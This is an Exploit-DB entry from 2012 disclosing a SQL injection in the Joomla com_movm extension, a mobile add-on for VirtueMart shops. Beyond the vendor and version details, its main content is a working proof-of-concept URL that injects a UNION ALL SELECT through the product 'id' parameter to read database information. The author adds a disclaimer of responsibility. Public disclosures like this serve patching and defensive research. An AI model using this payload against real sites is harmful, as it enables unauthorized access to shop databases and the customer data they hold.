Joomla Movm Extension com_movm SQL Injection

2012-08-01T00:00:00
ID EDB-ID:20170
Type exploitdb
Reporter D4NB4R
Modified 2012-08-01T00:00:00

Description

Joomla Movm Extension (com_movm) SQL Injection. Webapps exploit for php platform

                                        
                                            _______________________________________________________________________________________
  
 Exploit Title: Joomla com_movm SQL Injection
 
 Date: [31-07-2012]
 
 Author: Daniel Barragan "D4NB4R"
 
 Twitter: @D4NB4R
 
 site: http://poisonsecurity.wordpress.com/
 
 Vendor: http://www.movm.net/
 
 Version: 1.0 (Date Added 28 July 2012)
 
 License: Commercial $ 49.99 us

 Demo: http://www.movm.net/movm-mobile-virtuemart-site-demo/
  
 Tested on: [Linux(bt5)-Windows(7ultimate)]
 
 
 This component was released 3 days ago.be careful when using this component 
 Movm is a joomla extension for mobiles which optimize VirtueMart sites for iphone, android and blackberry. 
 It is compatible  with Joomla2.5 and VirtueMart 2.0.Have used Jquery mobile, so it gives native effect to Web App.
 This component can be Attacked from a mobile, put the following string in the url field.
 
 p0C

 http://server/index.php?option=com_movm&controller=product&task=product&id=999999'+UNION+ALL+SELECT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2Cdatabase()+FROM+information_schema.schemata--+D4NB4R%20

  
 
Im not responsible for which is given
No me hago responsable del uso que se le de
_______________________________________________________________________________________
Daniel Barragan "D4NB4R"  2012